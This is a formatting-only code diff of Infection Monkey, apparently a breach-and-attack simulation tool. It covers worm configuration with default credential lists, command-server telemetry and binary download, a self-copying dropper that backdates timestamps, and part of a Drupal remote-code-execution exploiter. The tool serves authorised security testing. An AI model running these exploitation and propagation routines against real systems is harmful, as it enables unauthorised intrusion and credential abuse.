kill_file_path_windows = '%windir%\\monkey.not'
kill_file_path_linux = '/var/run/monkey.not'
kill_file_path_windows = "%windir%\\monkey.not"
kill_file_path_linux = "/var/run/monkey.not"
###########################
# monkey config
@ -134,9 +139,7 @@ class Configuration(object):
current_server = ""
# Configuration servers to try to connect to, in this order.
command_servers = [
"192.0.2.0:5000"
]
command_servers = ["192.0.2.0:5000"]
# sets whether or not to locally save the running configuration after finishing
serialize_config = False
@ -150,7 +153,7 @@ class Configuration(object):
keep_tunnel_open_time = 60
# Monkey files directory name
monkey_dir_name = 'monkey_dir'
monkey_dir_name = "monkey_dir"
###########################
# scanners config
@ -165,22 +168,14 @@ class Configuration(object):
blocked_ips = []
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
8008, # HTTP alternate
7001 # Oracle Weblogic default server port
]
tcp_target_ports = [22,
2222,
445,
135,
3389,
HTTP_PORTS = [
80,
8080,
443,
8008,
3306,
9200,
5432]
8008, # HTTP alternate
7001, # Oracle Weblogic default server port
]
tcp_target_ports = [22, 2222, 445, 135, 3389, 80, 8080, 443, 8008, 3306, 9200, 5432]
tcp_target_ports.extend(HTTP_PORTS)
tcp_scan_timeout = 3000 # 3000 Milliseconds
tcp_scan_interval = 0 # in milliseconds
@ -221,11 +216,11 @@ class Configuration(object):
:return:
"""
cred_list = []
for cred in product(self.exploit_user_list, self.exploit_password_list, [''], ['']):
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [''], [''], self.exploit_ntlm_hash_list):
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [''], self.exploit_lm_hash_list, ['']):
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
cred_list.append(cred)
return cred_list
@ -241,15 +236,15 @@ class Configuration(object):
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed
exploit_user_list = ['Administrator', 'root', 'user']
exploit_user_list = ["Administrator", "root", "user"]
exploit_password_list = ["Password1!", "1234", "password", "12345678"]
exploit_lm_hash_list = []
exploit_ntlm_hash_list = []
exploit_ssh_keys = []
aws_access_key_id = ''
aws_secret_access_key = ''
aws_session_token = ''
aws_access_key_id = ""
aws_secret_access_key = ""
aws_session_token = ""
# smb/wmi exploiter
smb_download_timeout = 300 # timeout in seconds
@ -258,7 +253,16 @@ class Configuration(object):
# Timeout (in seconds) for sambacry's trigger to yield results.
sambacry_trigger_timeout = 5
# Folder paths to guess share lies inside.
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
sambacry_folder_paths_to_guess = [
"/",
"/mnt",
"/tmp",
"/storage",
"/export",
"/share",
"/shares",
"/home",
]
# Shares to not check if they're writable.
sambacry_shares_not_to_check = ["IPC$", "print$"]

View File

@ -9,9 +9,11 @@ from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel
from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT,
from common.common_consts.timeouts import (
LONG_REQUEST_TIMEOUT,
MEDIUM_REQUEST_TIMEOUT,
SHORT_REQUEST_TIMEOUT)
SHORT_REQUEST_TIMEOUT,
)
from common.common_consts.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from infection_monkey.config import GUID, WormConfiguration
from infection_monkey.network.info import check_internet_access, local_ips
@ -19,7 +21,7 @@ from infection_monkey.transport.http import HTTPConnectProxy
from infection_monkey.transport.tcp import TcpProxy
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
__author__ = 'hoffer'
__author__ = "hoffer"
requests.packages.urllib3.disable_warnings()
@ -49,27 +51,34 @@ class ControlClient(object):
if has_internet_access is None:
has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {'guid': GUID,
'hostname': hostname,
'ip_addresses': local_ips(),
'description': " ".join(platform.uname()),
'internet_access': has_internet_access,
'config': WormConfiguration.as_dict(),
'parent': parent}
monkey = {
"guid": GUID,
"hostname": hostname,
"ip_addresses": local_ips(),
"description": " ".join(platform.uname()),
"internet_access": has_internet_access,
"config": WormConfiguration.as_dict(),
"parent": parent,
}
if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https')
monkey["tunnel"] = ControlClient.proxies.get("https")
requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
requests.post(
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey),
headers={'content-type': 'application/json'},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=20)
timeout=20,
)
@staticmethod
def find_server(default_tunnel=None):
LOG.debug("Trying to wake up with Monkey Island servers list: %r" % WormConfiguration.command_servers)
LOG.debug(
"Trying to wake up with Monkey Island servers list: %r"
% WormConfiguration.command_servers
)
if default_tunnel:
LOG.debug("default_tunnel: %s" % (default_tunnel,))
@ -83,10 +92,12 @@ class ControlClient(object):
if ControlClient.proxies:
debug_message += " through proxies: %s" % ControlClient.proxies
LOG.debug(debug_message)
requests.get(f"https://{server}/api?action=is-up", # noqa: DUO123
requests.get(
f"https://{server}/api?action=is-up", # noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=TIMEOUT_IN_SECONDS)
timeout=TIMEOUT_IN_SECONDS,
)
WormConfiguration.current_server = current_server
break
@ -105,7 +116,7 @@ class ControlClient(object):
if proxy_find:
proxy_address, proxy_port = proxy_find
LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port))
ControlClient.proxies['https'] = 'https://%s:%s' % (proxy_address, proxy_port)
ControlClient.proxies["https"] = "https://%s:%s" % (proxy_address, proxy_port)
return ControlClient.find_server()
else:
LOG.info("No tunnel found")
@ -118,74 +129,97 @@ class ControlClient(object):
try:
monkey = {}
if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https')
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
monkey["tunnel"] = ControlClient.proxies.get("https")
requests.patch(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey),
headers={'content-type': 'application/json'},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return {}
@staticmethod
def send_telemetry(telem_category, json_data: str):
if not WormConfiguration.current_server:
LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category)
LOG.error(
"Trying to send %s telemetry before current server is established, aborting."
% telem_category
)
return
try:
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': json_data}
requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry),
headers={'content-type': 'application/json'},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
def send_log(log):
if not WormConfiguration.current_server:
return
try:
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
requests.post(
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry),
headers={'content-type': 'application/json'},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
def load_control_config():
if not WormConfiguration.current_server:
return
try:
reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
reply = requests.get(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return
try:
unknown_variables = WormConfiguration.from_kv(reply.json().get('config'))
LOG.info("New configuration was loaded from server: %r" %
(WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),))
unknown_variables = WormConfiguration.from_kv(reply.json().get("config"))
LOG.info(
"New configuration was loaded from server: %r"
% (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
)
except Exception as exc:
# we don't continue with default conf here because it might be dangerous
LOG.error("Error parsing JSON reply from control server %s (%s): %s",
WormConfiguration.current_server, reply._content, exc)
LOG.error(
"Error parsing JSON reply from control server %s (%s): %s",
WormConfiguration.current_server,
reply._content,
exc,
)
raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc)
if unknown_variables:
@ -196,14 +230,19 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({'config_error': True}),
headers={'content-type': 'application/json'},
requests.patch(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({"config_error": True}),
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return {}
@staticmethod
@ -221,7 +260,8 @@ class ControlClient(object):
@staticmethod
def download_monkey_exe_by_os(is_windows, is_32bit):
filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict(
ControlClient.spoof_host_os_info(is_windows, is_32bit))
ControlClient.spoof_host_os_info(is_windows, is_32bit)
)
if filename is None:
return None
return ControlClient.download_monkey_exe_by_filename(filename, size)
@ -241,14 +281,7 @@ class ControlClient(object):
else:
arch = "x86_64"
return \
{
"os":
{
"type": os,
"machine": arch
}
}
return {"os": {"type": os, "machine": arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@ -259,13 +292,15 @@ class ControlClient(object):
if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
return dest_file
else:
download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123
(WormConfiguration.current_server, filename),
download = requests.get(
"https://%s/api/monkey/download/%s"
% (WormConfiguration.current_server, filename), # noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
with monkeyfs.open(dest_file, 'wb') as file_obj:
with monkeyfs.open(dest_file, "wb") as file_obj:
for chunk in download.iter_content(chunk_size=DOWNLOAD_CHUNK):
if chunk:
file_obj.write(chunk)
@ -274,8 +309,9 @@ class ControlClient(object):
return dest_file
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
def get_monkey_exe_filename_and_size_by_host(host):
@ -286,24 +322,29 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return None, None
try:
reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123
reply = requests.post(
"https://%s/api/monkey/download"
% (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict),
headers={'content-type': 'application/json'},
verify=False, proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT)
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
)
if 200 == reply.status_code:
result_json = reply.json()
filename = result_json.get('filename')
filename = result_json.get("filename")
if not filename:
return None, None
size = result_json.get('size')
size = result_json.get("size")
return filename, size
else:
return None, None
except Exception as exc:
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return None, None
@ -312,11 +353,11 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return None
my_proxy = ControlClient.proxies.get('https', '').replace('https://', '')
my_proxy = ControlClient.proxies.get("https", "").replace("https://", "")
if my_proxy:
proxy_class = TcpProxy
try:
target_addr, target_port = my_proxy.split(':', 1)
target_addr, target_port = my_proxy.split(":", 1)
target_port = int(target_port)
except ValueError:
return None
@ -329,34 +370,43 @@ class ControlClient(object):
@staticmethod
def get_pba_file(filename):
try:
return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123
(WormConfiguration.current_server, filename),
return requests.get(
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT)
timeout=LONG_REQUEST_TIMEOUT,
)
except requests.exceptions.RequestException:
return False
@staticmethod
def get_T1216_pba_file():
try:
return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
T1216_PBA_FILE_DOWNLOAD_PATH),
return requests.get(
urljoin(
f"https://{WormConfiguration.current_server}/", # noqa: DUO123
T1216_PBA_FILE_DOWNLOAD_PATH,
),
verify=False,
proxies=ControlClient.proxies,
stream=True,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except requests.exceptions.RequestException:
return False
@staticmethod
def should_monkey_run(vulnerable_port: str) -> bool:
if vulnerable_port and \
WormConfiguration.get_hop_distance_to_island() > 1 and \
ControlClient.can_island_see_port(vulnerable_port) and \
WormConfiguration.started_on_island:
raise PlannedShutdownException("Monkey shouldn't run on current machine "
"(it will be exploited later with more depth).")
if (
vulnerable_port
and WormConfiguration.get_hop_distance_to_island() > 1
and ControlClient.can_island_see_port(vulnerable_port)
and WormConfiguration.started_on_island
):
raise PlannedShutdownException(
"Monkey shouldn't run on current machine "
"(it will be exploited later with more depth)."
)
return True
@staticmethod
@ -365,13 +415,15 @@ class ControlClient(object):
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response['status'] == "port_visible"
return response["status"] == "port_visible"
except requests.exceptions.RequestException:
return False
@staticmethod
def report_start_on_island():
requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({'started_on_island': True}),
requests.post(
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({"started_on_island": True}),
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)

View File

@ -13,7 +13,11 @@ from ctypes import c_char_p
from common.utils.attack_utils import ScanStatus, UsageEnum
from infection_monkey.config import WormConfiguration
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
from infection_monkey.model import GENERAL_CMDLINE_LINUX, MONKEY_CMDLINE_LINUX, MONKEY_CMDLINE_WINDOWS
from infection_monkey.model import (
GENERAL_CMDLINE_LINUX,
MONKEY_CMDLINE_LINUX,
MONKEY_CMDLINE_WINDOWS,
)
from infection_monkey.system_info import OperatingSystem, SystemInfoCollector
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
@ -29,7 +33,7 @@ except NameError:
# noinspection PyShadowingBuiltins
WindowsError = IOError
__author__ = 'itamar'
__author__ = "itamar"
LOG = logging.getLogger(__name__)
@ -39,108 +43,141 @@ MOVEFILE_DELAY_UNTIL_REBOOT = 4
class MonkeyDrops(object):
def __init__(self, args):
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-p', '--parent')
arg_parser.add_argument('-t', '--tunnel')
arg_parser.add_argument('-s', '--server')
arg_parser.add_argument('-d', '--depth', type=int)
arg_parser.add_argument('-l', '--location')
arg_parser.add_argument('-vp', '--vulnerable-port')
arg_parser.add_argument("-p", "--parent")
arg_parser.add_argument("-t", "--tunnel")
arg_parser.add_argument("-s", "--server")
arg_parser.add_argument("-d", "--depth", type=int)
arg_parser.add_argument("-l", "--location")
arg_parser.add_argument("-vp", "--vulnerable-port")
self.monkey_args = args[1:]
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {'source_path': os.path.abspath(sys.argv[0]),
'destination_path': self.opts.location}
self._config = {
"source_path": os.path.abspath(sys.argv[0]),
"destination_path": self.opts.location,
}
def initialize(self):
LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config))
def start(self):
if self._config['destination_path'] is None:
if self._config["destination_path"] is None:
LOG.error("No destination path specified")
return False
# we copy/move only in case path is different
try:
file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path'])
file_moved = filecmp.cmp(self._config["source_path"], self._config["destination_path"])
except OSError:
file_moved = False
if not file_moved and os.path.exists(self._config['destination_path']):
os.remove(self._config['destination_path'])
if not file_moved and os.path.exists(self._config["destination_path"]):
os.remove(self._config["destination_path"])
# first try to move the file
if not file_moved and WormConfiguration.dropper_try_move_first:
try:
shutil.move(self._config['source_path'],
self._config['destination_path'])
shutil.move(self._config["source_path"], self._config["destination_path"])
LOG.info("Moved source file '%s' into '%s'",
self._config['source_path'], self._config['destination_path'])
LOG.info(
"Moved source file '%s' into '%s'",
self._config["source_path"],
self._config["destination_path"],
)
file_moved = True
except (WindowsError, IOError, OSError) as exc:
LOG.debug("Error moving source file '%s' into '%s': %s",
self._config['source_path'], self._config['destination_path'],
exc)
LOG.debug(
"Error moving source file '%s' into '%s': %s",
self._config["source_path"],
self._config["destination_path"],
exc,
)
# if file still need to change path, copy it
if not file_moved:
try:
shutil.copy(self._config['source_path'],
self._config['destination_path'])
shutil.copy(self._config["source_path"], self._config["destination_path"])
LOG.info("Copied source file '%s' into '%s'",
self._config['source_path'], self._config['destination_path'])
LOG.info(
"Copied source file '%s' into '%s'",
self._config["source_path"],
self._config["destination_path"],
)
except (WindowsError, IOError, OSError) as exc:
LOG.error("Error copying source file '%s' into '%s': %s",
self._config['source_path'], self._config['destination_path'],
exc)
LOG.error(
"Error copying source file '%s' into '%s': %s",
self._config["source_path"],
self._config["destination_path"],
exc,
)
return False
if WormConfiguration.dropper_set_date:
if sys.platform == 'win32':
dropper_date_reference_path = os.path.expandvars(WormConfiguration.dropper_date_reference_path_windows)
if sys.platform == "win32":
dropper_date_reference_path = os.path.expandvars(
WormConfiguration.dropper_date_reference_path_windows
)
else:
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
try:
ref_stat = os.stat(dropper_date_reference_path)
except OSError:
LOG.warning("Cannot set reference date using '%s', file not found",
dropper_date_reference_path)
LOG.warning(
"Cannot set reference date using '%s', file not found",
dropper_date_reference_path,
)
else:
try:
os.utime(self._config['destination_path'],
(ref_stat.st_atime, ref_stat.st_mtime))
os.utime(
self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
)
except OSError:
LOG.warning("Cannot set reference date to destination file")
monkey_options = \
build_monkey_commandline_explicitly(parent=self.opts.parent,
monkey_options = build_monkey_commandline_explicitly(
parent=self.opts.parent,
tunnel=self.opts.tunnel,
server=self.opts.server,
depth=self.opts.depth,
location=None,
vulnerable_port=self.opts.vulnerable_port)
vulnerable_port=self.opts.vulnerable_port,
)
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
+ monkey_options
)
else:
dest_path = self._config['destination_path']
dest_path = self._config["destination_path"]
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
# runs the monkey
inner_monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options
monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")],
'monkey_commandline': inner_monkey_cmdline}
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
+ monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
"monkey_commandline": inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
monkey_process = subprocess.Popen(
monkey_cmdline,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True, creationflags=DETACHED_PROCESS)
close_fds=True,
creationflags=DETACHED_PROCESS,
)
LOG.info("Executed monkey process (PID=%d) with command line: %s",
monkey_process.pid, monkey_cmdline)
LOG.info(
"Executed monkey process (PID=%d) with command line: %s",
monkey_process.pid,
monkey_cmdline,
)
time.sleep(3)
if monkey_process.poll() is not None:
@ -150,25 +187,35 @@ class MonkeyDrops(object):
LOG.info("Cleaning up the dropper")
try:
if (self._config['source_path'].lower() != self._config['destination_path'].lower()) and \
os.path.exists(self._config['source_path']) and \
WormConfiguration.dropper_try_move_first:
if (
(self._config["source_path"].lower() != self._config["destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):
# try removing the file first
try:
os.remove(self._config['source_path'])
os.remove(self._config["source_path"])
except Exception as exc:
LOG.debug("Error removing source file '%s': %s", self._config['source_path'], exc)
LOG.debug(
"Error removing source file '%s': %s", self._config["source_path"], exc
)
# mark the file for removal on next boot
dropper_source_path_ctypes = c_char_p(self._config['source_path'])
if 0 == ctypes.windll.kernel32.MoveFileExA(dropper_source_path_ctypes, None,
MOVEFILE_DELAY_UNTIL_REBOOT):
LOG.debug("Error marking source file '%s' for deletion on next boot (error %d)",
self._config['source_path'], ctypes.windll.kernel32.GetLastError())
dropper_source_path_ctypes = c_char_p(self._config["source_path"])
if 0 == ctypes.windll.kernel32.MoveFileExA(
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
"Error marking source file '%s' for deletion on next boot (error %d)",
self._config["source_path"],
ctypes.windll.kernel32.GetLastError(),
)
else:
LOG.debug("Dropper source file '%s' is marked for deletion on next boot",
self._config['source_path'])
LOG.debug(
"Dropper source file '%s' is marked for deletion on next boot",
self._config["source_path"],
)
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
LOG.info("Dropper cleanup complete")

View File

@ -8,7 +8,7 @@ from common.utils.exploit_enum import ExploitType
from infection_monkey.config import WormConfiguration
from infection_monkey.utils.plugins.plugin import Plugin
__author__ = 'itamar'
__author__ = "itamar"
logger = logging.getLogger(__name__)
@ -48,31 +48,42 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_info = {
"display_name": self._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
self.exploit_info["started"] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
self.exploit_info["finished"] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
return self.host.os.get("type") in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
{
"result": result,
"user": user,
"password": password,
"lm_hash": lm_hash,
"ntlm_hash": ntlm_hash,
"ssh_key": ssh_key,
}
)
def exploit_host(self):
self.pre_exploit()
@ -80,9 +91,9 @@ class HostExploiter(Plugin):
try:
result = self._exploit_host()
except FailedExploitationError as e:
logger.debug(f'Exploiter failed: {e}.')
logger.debug(f"Exploiter failed: {e}.")
except Exception:
logger.error('Exception in exploit_host', exc_info=True)
logger.error("Exception in exploit_host", exc_info=True)
finally:
self.post_exploit()
return result
@ -98,10 +109,10 @@ class HostExploiter(Plugin):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
self.exploit_info["vulnerable_urls"].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
self.exploit_info["vulnerable_ports"].append(port)
def add_executed_cmd(self, cmd):
"""
@ -109,5 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append(
{'cmd': cmd, 'powershell': powershell})
self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})

View File

@ -9,20 +9,19 @@ from urllib.parse import urljoin
import requests
from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT,
MEDIUM_REQUEST_TIMEOUT)
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.network.network_utils import remove_port
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING
__author__ = 'Ophir Harpaz'
__author__ = "Ophir Harpaz"
LOG = logging.getLogger(__name__)
class DrupalExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Drupal Server'
_TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Drupal Server"
def __init__(self, host):
super(DrupalExploiter, self).__init__(host)
@ -34,9 +33,11 @@ class DrupalExploiter(WebRCE):
:return: the Drupal exploit config
"""
exploit_config = super(DrupalExploiter, self).get_exploit_config()
exploit_config['url_extensions'] = ['node/', # In Linux, no path is added
'drupal/node/'] # However, Bitnami installations are under /drupal
exploit_config['dropper'] = True
exploit_config["url_extensions"] = [
"node/", # In Linux, no path is added
"drupal/node/",
] # However, Bitnami installations are under /drupal
exploit_config["dropper"] = True
return exploit_config
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
@ -51,17 +52,19 @@ class DrupalExploiter(WebRCE):
try:
node_ids = find_exploitbale_article_ids(url)
if node_ids is None:
LOG.info('Could not find a Drupal node to attack')
LOG.info("Could not find a Drupal node to attack")
continue
for node_id in node_ids:
node_url = urljoin(url, str(node_id))
if self.check_if_exploitable(node_url):
self.add_vuln_url(url) # This is for report. Should be refactored in the future
self.add_vuln_url(
url
) # This is for report. Should be refactored in the future
self.vulnerable_urls.append(node_url)
if stop_checking:
break
except Exception as e: # We still don't know which errors to expect
LOG.error(f'url {url} failed in exploitability check: {e}')
LOG.error(f"url {url} failed in exploitability check: {e}")
if not self.vulnerable_urls:
LOG.info("No vulnerable urls found")
@ -75,35 +78,39 @@ class DrupalExploiter(WebRCE):
"""
payload = build_exploitability_check_payload(url)
response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
response = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT)
timeout=MEDIUM_REQUEST_TIMEOUT,
)
if is_response_cached(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
LOG.info(f"Checking if node {url} is vuln returned cache HIT, ignoring")
return False
return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
return "INVALID_VALUE does not correspond to an entity on this site" in response.text
def exploit(self, url, command):
# pad a easy search replace output:
cmd = f'echo {ID_STRING} && {command}'
cmd = f"echo {ID_STRING} && {command}"
base = remove_port(url)
payload = build_cmd_execution_payload(base, cmd)
r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
r = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=LONG_REQUEST_TIMEOUT)
timeout=LONG_REQUEST_TIMEOUT,
)
if is_response_cached(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
LOG.info(f"Exploiting {url} returned cache HIT, may have failed")
if ID_STRING not in r.text:
LOG.warning('Command execution _may_ have failed')
LOG.warning("Command execution _may_ have failed")
result = r.text.split(ID_STRING)[-1]
return result
@ -126,14 +133,16 @@ class DrupalExploiter(WebRCE):
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(f'{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server '
f'but only {num_available_urls} found')
LOG.info(
